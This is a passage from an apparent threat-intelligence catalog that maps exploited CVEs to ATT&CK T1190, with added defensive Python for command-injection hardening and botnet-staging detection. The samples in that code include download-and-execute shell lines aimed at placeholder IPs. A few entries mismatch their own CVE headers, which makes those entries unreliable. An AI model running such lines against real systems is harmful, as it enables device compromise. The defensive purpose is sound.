This vulnerability is exploited by a remote, authenticated user with access to internal API functions, allowing attackers to upload and execute arbitrary code. It has been exploited by threat actors associated with AvosLocker ransomware, as identified by Kroll analysts. These actors have developed new tactics targeting backup systems, specifically leveraging vulnerabilities in Veeam Backup & Replication software (CVE-2022-26500 and CVE-2022-26501) to potentially exfiltrate data while evading detection.
                              References
                              CVE-2022-26258 D-Link DIR-820L Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This remote command execution vulnerability is exploited by an adversary via an HTTP POST to get set ccp. The exploit targets a command injection vulnerability in the /lan.asp component, which does not sanitize the value of the HTTP parameter DeviceName, leading to arbitrary command execution. Adversaries have leveraged this vulnerability to spread a Mirai variant called MooBot and conduct distributed denial of service attacks.
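Several of the command injection entries above (Accellion FTA, Edimax IC-7100, D-Link DIR-820L) share one root cause: an HTTP parameter is spliced into a shell command string. The following added example, written in Python rather than the embedded firmware's own language and not taken from any of those products, contrasts that pattern with a hardened handler that allow-lists the value and invokes the program without a shell. The `hostname` command and the DeviceName parameter name are illustrative assumptions, not the vendors' implementation.

```python
import re
import shlex
import subprocess

# RFC 1123 hostname label: letters, digits, inner hyphens, 1-63 chars. Nothing else reaches the shell.
HOSTNAME_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

SHELL_SEPARATORS = {";", "&", "&&", "|", "||"}


def unsafe_command(device_name):
    """Vulnerable pattern (illustrative, not any vendor's code): the request parameter is
    concatenated into a command string destined for system()/shell=True. The string is
    returned rather than executed so the injection can be inspected safely."""
    return f"hostname {device_name}"


def shell_statements(command):
    """Count how many statements a POSIX shell would run for the string, by tokenising
    with shlex in punctuation mode and counting unquoted separators. 1 means no injection."""
    lexer = shlex.shlex(command, punctuation_chars=True)
    return 1 + sum(1 for token in lexer if token in SHELL_SEPARATORS)


def safe_set_device_name(device_name, run=False):
    """Hardened handler: allow-list the value, then pass it as a single argv element.
    With no shell involved, ; | & $() and backticks are just bytes in an argument."""
    if not HOSTNAME_LABEL.match(device_name):
        raise ValueError(f"rejected DeviceName: {device_name!r}")
    argv = ["hostname", device_name]
    if run:  # off by default so the example runs without privileges
        subprocess.run(argv, check=True)
    return argv


if __name__ == "__main__":
    benign = "router1"
    hostile = "router1; wget http://198.51.100.9/x.sh -O /tmp/x.sh; sh /tmp/x.sh"
    for name in (benign, hostile):
        cmd = unsafe_command(name)
        print(f"{cmd!r} -> {shell_statements(cmd)} shell statement(s)")
    print(safe_set_device_name(benign))
    try:
        safe_set_device_name(hostile)
    except ValueError as exc:
        print(exc)
```

The allow-list is the primary control; the argv list is the second layer for the case where a value slips through validation. Blocklisting shell metacharacters instead of allow-listing is the usual mistake, because `$(...)`, backticks, newlines and IFS tricks are easy to miss.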
                              References
                              CVE-2022-26134 Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by placing a payload in the URI of an HTTP request to a public-facing server.
                              References
                              CVE-2022-22965 Spring Framework JDK 9+ Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote code execution (RCE) vulnerability affects Spring MVC or Spring WebFlux applications running on JDK 9+ when deployed on Tomcat as a WAR file. This vulnerability can be exploited by a remote attacker via data binding, allowing malicious actors to execute arbitrary code. Specifically, it has been used to deploy and execute the Mirai botnet malware. The exploit involves downloading a Mirai sample to the "/tmp" directory and changing its permissions to make it executable using "chmod." The malware is then executed, enabling further malicious activities. The vulnerability does not affect applications deployed as Spring Boot executable jars. Observations of this exploit began in early April 2022, with malware variants available for different CPU architectures.
                              References
                              CVE-2022-22963 VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
In certain versions of Spring Cloud Function, a vulnerability allows remote code execution through a specially crafted Spring Expression Language (SpEL) routing expression. It was disclosed in the same week as Spring4Shell (CVE-2022-22965) and is frequently conflated with it, but it is a distinct flaw in Spring Cloud Function rather than in Spring Core. Attackers have actively exploited it to execute malicious Java code on vulnerable servers, with initial exploit attempts observed against a honeypot on port 9001. Reporting from the same period describes an exploit that modifies logging configuration to write a webshell into a log file that is then invoked via a browser; that technique belongs to Spring4Shell. Although scanning for vulnerable hosts has been observed, exploitation is less widespread than Log4Shell because it requires specific conditions beyond merely using the framework.
                              References
                              CVE-2021-45382 D-Link Multiple Routers Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote command execution vulnerability is exploited by an unauthenticated, remote adversary via the DDNS function in ncc2 binary file. Adversaries have leveraged this vulnerability to spread a variant of Mirai botnet called Beastmode and IZ1H9 to cause a distributed denial of service attack. In the IZ1H9 attack, once the attackers took advantage of the vulnerability, they injected the IZ1H9 payload into the device. This program included instructions to download another script from a specific web address. When this script ran, it erased records to cover up the malicious actions and then downloaded additional software designed for different types of devices. The script also changed the device's settings to block certain network connections, making it more difficult to remove the malware. After these steps, the infected device connected to a control server, waiting for instructions on which type of denial-of-service attack to carry out, such as disrupting services using various internet protocols. In the Beastmode attack, exploiting the vulnerability led to the download and execution of a script called "ddns.sh." This script then fetched the Beastmode program, which was saved and run with specific settings. These settings allowed the infected device to join a subgroup within the larger botnet, helping the attackers manage and assess the effectiveness of their exploits. Once devices were compromised by Beastmode, the botnet could be used to launch various types of denial-of-service attacks, similar to those seen in other Mirai-based botnets.
                              References
                              CVE-2021-44228 Apache Log4j2 Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote code execution vulnerability is exploited through maliciously-crafted requests to a web application.
                              References
                              CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2021-44077 is an unauthenticated remote code execution vulnerability. The following post-exploitation activity has been observed from adversaries: writing webshells to disk for persistence, obfuscating and deobfuscating/decoding files or information, dumping user credentials, using only signed Windows binaries for follow-on actions, adding or deleting user accounts as needed, exfiltrating the Active Directory database, using Windows Management Instrumentation for remote execution, deleting files to remove indicators from the host, discovering domain accounts, collecting and archiving files for exfiltration, and using symmetric encryption for command and control.
                              References
                              CVE-2021-39144 XStream Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability allows a remote attacker to execute arbitrary code on the target system. It exists due to the deserialization of untrusted data in XStream versions up to 1.4.18. A remote attacker can exploit this by sending a specially crafted XStream marshalled payload to an endpoint in VMware NSX Manager, which uses the vulnerable xstream-1.4.18.jar package. Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system, allowing execution of commands with root privileges.
                              References
                              CVE-2021-35464 ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2021-35464 is a pre-auth remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.
                              References
                              CVE-2021-35394 Realtek Jungle SDK Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability in Realtek Jungle chipsets is exploited by remote, unauthenticated attackers using UDP packets to a server on port 9034, enabling remote execution of arbitrary commands. The attack involves injecting a shell command that downloads and executes a shell script on the compromised device. This script downloads binaries for various CPU architectures, such as ARM, MIPS, and SuperH, primarily from the Mirai malware family, turning the device into a botnet node. The attack script connects to a malicious IP to download and execute malware, with threats mainly from Mirai, Gafgyt, and Mozi families. It also includes a new DDoS botnet called RedGoBot, developed in Golang. The script uses wget and curl to download botnet clients for different processor architectures. RedGoBot can perform DDoS attacks on various protocols, including HTTP, ICMP, TCP, UDP, VSE, and OpenVPN, upon receiving commands from the threat operator. Additionally, injected commands can write binary payloads to files for execution or reboot the targeted server to cause denial of service.
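The botnet staging described for the Spring Framework (CVE-2022-22965), the D-Link routers (CVE-2021-45382) and the Realtek SDK (CVE-2021-35394) entries follows one pattern: fetch a payload from a bare IP with wget or curl, drop it in a world-writable directory such as /tmp, chmod it executable, and run it, often as architecture-named binaries. The following added example (not code from this page or from any vendor or researcher cited here) scores constructed process command lines against those stages; the sample lines and IP addresses are made up.

```python
import re

# Constructed process command lines, as an EDR or auditd execve log would record them. Not real samples.
SAMPLE_COMMANDS = [
    "wget http://198.51.100.23/bins/mips -O /tmp/mips; chmod +x /tmp/mips; /tmp/mips",
    "cd /tmp || cd /var/run; curl -s http://198.51.100.23/ddns.sh -o ddns.sh; sh ddns.sh",
    "wget -q https://deb.debian.org/debian/dists/stable/Release -O /var/cache/Release",
    "chmod +x /usr/local/bin/backup.sh && /usr/local/bin/backup.sh",
    "busybox wget http://198.51.100.23/arm7 -O- > /tmp/.x; chmod 777 /tmp/.x; /tmp/.x",
]

STAGING = r"(?:/tmp|/var/tmp|/var/run|/dev/shm)"

DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
BARE_IP = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
STAGING_PATH = re.compile(STAGING + r"(?:/|\s|$)")
# chmod +x / a+x / 777 / 755: any mode that adds execute permission
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?:[ugoa]*\+[rwst]*x[rwst]*|[0-7]{3,4})\b")
# a statement that runs a file from the staging dir, or feeds a file to a shell interpreter
EXEC_FROM_STAGING = re.compile(
    r"(?:^|[;&|]\s*)(?:" + STAGING + r"/\S+|(?:busybox\s+)?(?:sh|bash|ash)\s+\S+)"
)
ARCH_NAME = re.compile(
    r"\b(?:mips(?:el)?|arm\d?|armv\dl?|sh4|i[3-6]86|x86(?:_64)?|ppc|m68k|sparc)\b"
)

# Each stage is one point; routine admin commands rarely hit more than one or two.
STAGES = [
    ("downloader fetching from a bare IP", lambda c: DOWNLOADER.search(c) and BARE_IP.search(c)),
    ("touches world-writable staging directory", STAGING_PATH.search),
    ("chmod adds execute permission", CHMOD_EXEC.search),
    ("executes from staging directory or via sh <file>", EXEC_FROM_STAGING.search),
    ("architecture-named payload", ARCH_NAME.search),
]


def score_command(cmd):
    """Return (score, matched stage names) for one command line."""
    reasons = [name for name, test in STAGES if test(cmd)]
    return len(reasons), reasons


def detect(commands, threshold=3):
    """Return the commands whose stage score reaches the threshold, with their evidence."""
    hits = []
    for index, cmd in enumerate(commands):
        score, reasons = score_command(cmd)
        if score >= threshold:
            hits.append({"index": index, "score": score, "reasons": reasons, "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_COMMANDS):
        print(hit["score"], hit["command"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Scoring rather than matching a single signature is deliberate: the Realtek and D-Link reports differ in downloader, directory and binary names, but each shows at least three of the five stages, while the package-mirror fetch and the backup script trip only one.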
                              References
                              CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is a remote code execution vulnerability that is often chained with CVE-2021-34523, a privilege escalation vulnerability.
                              References
                              CVE-2021-31166 Microsoft HTTP Protocol Stack Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
This memory corruption vulnerability is exploited by a remote, unauthenticated attacker via crafted HTTP packets sent to a server that uses http.sys to process them. Adversaries may leverage it to execute malicious code in the OS kernel. A proof of concept shows that the vulnerability is potentially wormable, but no in-the-wild exploitation with that impact has been published. The North Korean state-backed Lazarus Group has been reported to leverage this vulnerability to gain initial access to Windows IIS servers; once in, they have used the compromised system for data theft, service disruption, malware propagation, or espionage and surveillance. Public threat reporting that ties this vulnerability to confirmed command execution in an actual intrusion remains limited.
                              References
                              CVE-2021-27065 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2021-27065, part of ProxyLogon, is a post-authentication arbitrary file write vulnerability in Exchange. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities. An attacker, authenticated either by exploiting CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
                              References
                              CVE-2021-26858 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2021-26858, part of ProxyLogon, is a post-authentication arbitrary file write vulnerability in Exchange. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities. An attacker, authenticated either by exploiting CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
                              References
                              CVE-2021-22986 F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-22986 is a remote command execution vulnerability occurring on the iControl REST interface. Impact reported by the F5 security advisory "This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. "
                              References
                              CVE-2021-22205 GitLab Community and Enterprise Editions Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2021-22205 is a critical remote code execution vulnerability allowing unauthenticated attackers to execute arbitrary commands on affected systems. It was reported to be actively exploited to assemble botnets and launch large-scale distributed denial of service (DDoS) attacks.
                              References
                              CVE-2021-22204 ExifTool Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability is exploited by a remote attacker to execute arbitrary code on the target system. The vulnerability exists due to improper input validation when parsing DjVu files in ExifTool. A remote attacker can pass a specially crafted file to the application and execute arbitrary code on the target system. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
                              References
                              CVE-2021-21972 VMware vCenter Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-21972 is a RCE vulnerability affecting VMware vCenter servers. An attacker with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
                              References
                              CVE-2020-5902 F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CISA reported adversaries exploiting CVE-2020-5902, an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI), to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to "execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code." (CISA Advisory)
                              References
                              CVE-2020-17530 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2020-17530 is a remote code execution vulnerability in Apache Struts versions 2.0.0 - 2.5.25 that allows an attacker to execute arbitrary code via forced Object Graph Navigation Language (OGNL) evaluation on raw user input in tag attributes.
                              References
                              CVE-2020-15505 Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector that allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors. Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.
                              References
                              CVE-2020-0688 Microsoft Exchange Server Validation Key Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
CVE-2020-0688 is an RCE vulnerability that exists in Microsoft Exchange software when the software fails to properly handle objects in memory. A nation-state APT actor has been observed exploiting this vulnerability for remote code execution after obtaining credentials through widespread, distributed, and anonymized brute force attempts against hundreds of government and private sector targets worldwide.
                              References
                              CVE-2019-17558 Apache Solr VelocityResponseWriter Plug-In Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-17558 is a vulnerability in Apache Solr that allows for Remote Code Execution (RCE) through the VelocityResponseWriter.
                              References
                              CVE-2019-11634 Citrix Workspace Application and Receiver for Windows Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
A vulnerability in Citrix Receiver for Windows may allow an attacker to gain read/write access to the client's local drives, potentially enabling code execution on the client device, such as deploying ransomware.
                              References
                              CVE-2019-0604 Microsoft SharePoint Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-0604 is a vulnerability in an XML deserialization component within Microsoft SharePoint that allowed remote attackers to install webshell malware on vulnerable hosts.
                              References
                              CVE-2018-7600 Drupal Core Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-7602 is a remote code execution (RCE) vulnerability affecting Drupal versions 7 and 8. According to reports, successful exploitation has been used to gain the permissions needed to modify or delete the content of a Drupal-run site and in crypto-jacking campaigns.
                              References
                              CVE-2018-11776 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-11776 is a remote code execution vulnerability in the Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers when alwaysSelectFullNamespace is true and then results are used with no namespace.
                              References
                              CVE-2017-9822 DotNetNuke (DNN) Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-9822 is a vulnerability that allows an attacker to exploit cookie deserialization, leading to remote code execution (RCE). It has been noted for its potential impact on various web applications.
                              References
                              CVE-2017-5638 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-5638 is a remote code execution vulnerability in Apache Struts Jakarta Multipart versions that allows for malicious file upload using the Content-Type, Content-Disposition, or Content-Length HTTP headers during file-upload attempts, allowing an attacker to execute arbitrary commands. This CVE was known to be exploited during the Equifax breach.
                              References
                              CVE-2016-4437 Apache Shiro Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2016-4437 is a code execution vulnerability in Apache Shiro that allows remote attackers to execute code or bypass access restrictions via an unspecified request parameter when a cipher key has not been configured for the "remember me" feature.
                              References
                              CVE-2014-7169 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2014-7169 allows environment variables set from service/HTTP requests on a server (e.g., HTTP_COOKIE) to be interpreted by the Bash shell, which spawns a child shell with the authority/privilege level of the parent shell and performs RCE of code provided by the adversary in the request.
                              References
                              CVE-2014-6271 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2014-6271 allows environment variables set from service/HTTP requests on a server (e.g., HTTP_COOKIE) to be interpreted by the Bash shell, which spawns a child shell with the authority/privilege level of the parent shell and performs RCE of code provided by the adversary in the request.
                              References
                              CVE-2016-10033 PHPMailer Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2024-4879 ServiceNow Improper Input Validation Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4879 is a Template Injection Vulnerability in ServiceNow UI Macros. When ServiceNow instances are deployed public-facing instead of internally, they can be exploited for arbitrary code execution. Adversaries have been observed selling data exfiltrated through this exploit.
                              References
                              CVE-2022-24086 Adobe Commerce and Magento Open Source Improper Input Validation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability can be exploited via a public-facing e-commerce application in order to achieve remote code execution. To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated.
                              References
                              CVE-2024-21762 Fortinet FortiOS Out-of-Bound Write Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows adversaries to execute arbitrary code via specially crafted HTTP requests that trigger an out-of-bounds write. Threat actors have been observed creating a symbolic link, left behind to maintain read-only access to impacted devices.
                              References
                              CVE-2025-5777 Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This memory leak vulnerability in Citrix NetScaler/ADC Gateway devices can be leveraged by sending malicious authentication requests, leaking sensitive information.
                              References
                              CVE-2024-4358 Progress Telerik Report Server Authentication Bypass by Spoofing Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4358 is an authentication bypass vulnerability. This has been seen to be chained with CVE-2024-1800 in order to achieve remote code execution.
                              References
                              CVE-2024-27198 JetBrains TeamCity Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by an unauthenticated, remote adversary via an alternative path issue in the web component allowing attackers to perform admin actions and achieve remote code execution. To exploit this vulnerability, attackers need to generate an unauthenticated 404 HTTP response, pass the HTTP query string “?jsp=/app/rest/server”, and append “;.jsp” to the HTTP path parameter.
                              References
                              CVE-2023-46805 Ivanti Connect Secure and Policy Secure Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an authentication bypass weakness in the web component of Ivanti Connect Secure and Ivanti Policy Secure. Remote attackers leverage this vulnerability to gain unauthorized access by bypassing control checks.
                              References
                              CVE-2023-42793 JetBrains TeamCity Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an authentication bypass in JetBrains TeamCity, allowing remote attackers with HTTP(S) access to perform unauthorized remote code execution. This vulnerability enables attackers to gain administrative control of the TeamCity server and execute cmd.exe for various malicious activities, including downloading and executing harmful files.
                              References
                              CVE-2023-38035 Ivanti Sentry Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability was exploited by unauthenticated actors who accessed the System Manager Portal of Ivanti MobileIron Sentry via port 8433, leveraging an authentication bypass flaw to achieve remote code execution. This flaw allows attackers to access sensitive APIs, enabling them to change configurations, execute system commands, or write files onto the system. This vulnerability was part of a campaign involving cryptocurrency mining and internal network reconnaissance. The exploitation allowed attackers to deploy malicious tools and conduct unauthorized activities within the network, ultimately compromising system integrity and security. The exploitation facilitated unauthorized access to the Ivanti Sentry server, allowing the execution of OS commands as a system administrator using "sudo." Observations revealed that suspicious SSL connections over port 8433 led to HTTP GET requests, indicating the abuse of command-line utilities like wget and cURL.
                              References
                              CVE-2023-35078 Ivanti Endpoint Manager Mobile Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an unauthenticated API access flaw in Ivanti EPMM. Attackers initiate this vulnerability by leveraging the default internet-facing API configuration, allowing them to access restricted functionalities without authentication. This enables them to extract personally identifiable information (PII) and perform administrative actions, such as creating new accounts and making configuration changes.
                              References
                              CVE-2022-40684 Fortinet Multiple Products Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2022-23131 Zabbix Frontend Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a malicious actor via improper validation of SAML data to modify session data and escalate privileges to gain admin access to the Zabbix Frontend. This allows attackers to control the saml_data[username_attribute] value. This flaw enables unauthenticated users to bypass authentication and access the Zabbix dashboard as a highly-privileged user, such as the default "Admin" user. Additionally, incorrect handling of Zabbix installer files permits unauthenticated users to access and reconfigure servers.
                              References
                              CVE-2022-1040 Sophos Firewall Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by remote attackers via the User Portal and Webadmin components. This vulnerability allows an attacker to execute arbitrary code on the victim machine. It was actively exploited by Chinese state-sponsored APT groups, including "Drifting Cloud," to target organizations and governments across South Asia, particularly in Afghanistan, Bhutan, India, Nepal, Pakistan, and Sri Lanka. The attackers leveraged this vulnerability to deploy webshells, conduct man-in-the-middle attacks by modifying DNS responses, and intercept user credentials and session cookies from content management systems. This vulnerability was exploited by Chinese state-sponsored threat actors as part of a broader campaign named "Pacific Rim." This campaign involved multiple Chinese APT groups, including APT31, APT41, and Volt Typhoon, targeting Sophos firewalls. The backdoor PygmyGoat, a novel rootkit that takes the form of a shared object ("libsophos.so"), has been found to be delivered following the exploitation of this vulnerability. The use of the rootkit was observed between March and April 2022 on a government device and a technology partner, and again in May 2022 on a machine in a military hospital based in Asia. This vulnerability was also exploited by at least two advanced persistent threat (APT) groups in a highly targeted attack campaign. The attackers used the vulnerability to place malicious files into a fixed filesystem location on affected devices, leveraging a combination of authentication bypass and command injection to execute arbitrary commands as root. The attack involved deploying various malware families, including GoMet and Gh0st RAT, to maintain persistent access and exfiltrate sensitive data. The attackers demonstrated significant knowledge of the device firmware, using custom ELF binaries and runtime packers like VMProtect to complicate analysis. They manipulated internal commands to move and manipulate files, execute processes, and exfiltrate data. The campaign targeted network security devices, employing a two-stage attack to drop remote access tools and execute commands remotely.
                              References
                              CVE-2021-44515 Zoho Desktop Central Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-44515 is an authentication bypass vulnerability. Post-exploit, APT actors were observed dropping a webshell, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials.
                              References
                              CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is an authentication bypass vulnerability that can enable remote code execution. Numerous post-exploitation impacts by threat actors are detailed in the referenced CISA report.
                              References
                              CVE-2021-39226 Grafana Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by both unauthenticated and authenticated adversaries via the snapshot feature in Grafana. Attackers have leveraged this vulnerability to access and manipulate snapshot data, potentially leading to unauthorized data exposure and loss. Exploitation techniques have not been made public. In exploitation scenarios, adversaries can view snapshots with the lowest database key by accessing specific paths, such as /dashboard/snapshot/:key or /api/snapshots/:key. If the "public_mode" configuration is set to true, unauthenticated users can also delete these snapshots using the path /api/snapshots-delete/:deleteKey. This capability allows attackers to enumerate and delete snapshot data, resulting in complete data loss.
                              References
                              CVE-2021-37415 Zoho ManageEngine ServiceDesk Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows access to a few REST API URLs without authentication.
                              References
                              CVE-2013-0632 Adobe ColdFusion Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2013-0625 Adobe ColdFusion Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited because of password misconfiguration.
                              References
                              CVE-2025-0108 Palo Alto Networks PAN-OS Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This exploit is part of a chain of exploits (with CVE-2025-0108 and CVE-2024-9474) that can end with an attacker gaining root access to the system. This vulnerability allows the attacker to bypass authentication using the PAN-OS web management interface, as well as invoke PHP scripts. The attacker can also use their newfound privileged access to reconfigure the firewall, allowing for backdoors to be created.
                              References
                              CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to a regex flaw, an attacker can use non-canonical URLs to bypass authentication. When chained with CVE-2022-43769, it can lead to unauthorized code execution.
                              References
                              CVE-2025-4427 Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By sending a specially crafted HTTP GET request to the Ivanti EPMM endpoint, an attacker can bypass the authentication mechanisms. This can be chained with CVE-2025-4428 to achieve remote code execution.
                              References
                              CVE-2023-49103 ownCloud graphapi Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an unauthenticated information disclosure flaw in the Graph API extension of ownCloud. Attackers first used this vulnerability to gain initial access by targeting the /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php endpoint, which allowed them to leak sensitive information via the PHP function phpinfo. By modifying the requested URI to bypass Apache web server rewrite rules, attackers could access environment variables containing secrets, such as usernames, passwords, and license keys.
                              References
                              CVE-2023-38205 Adobe ColdFusion Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-38205 is a vulnerability that is the result of an incomplete patch of CVE-2023-29298. An adversary remains able to exploit the public-facing application as a result of this vulnerability.
                              References
                              CVE-2023-29298 Adobe ColdFusion Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is used to exploit a public-facing application through a flaw in URL path validation.
                              References
                              CVE-2023-27350 PaperCut MF/NG Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-27350 allows an unauthenticated actor to execute malicious code remotely without credentials. Threat actors have been observed exploiting this software through its print scripting interface and installing command-and-control software on target machines.
                              References
                              CVE-2023-22518 Atlassian Confluence Data Center and Server Improper Authorization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-22518 is an improper authorization vulnerability. Adversaries have been seen using HTTP POST requests to upload maliciously-crafted zip files to Confluence WebServers to exploit this vulnerability. After exploitation, adversaries were observed doing local system information discovery and downloading malicious payloads.
                              References
                              CVE-2023-22515 Atlassian Confluence Data Center and Server Broken Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
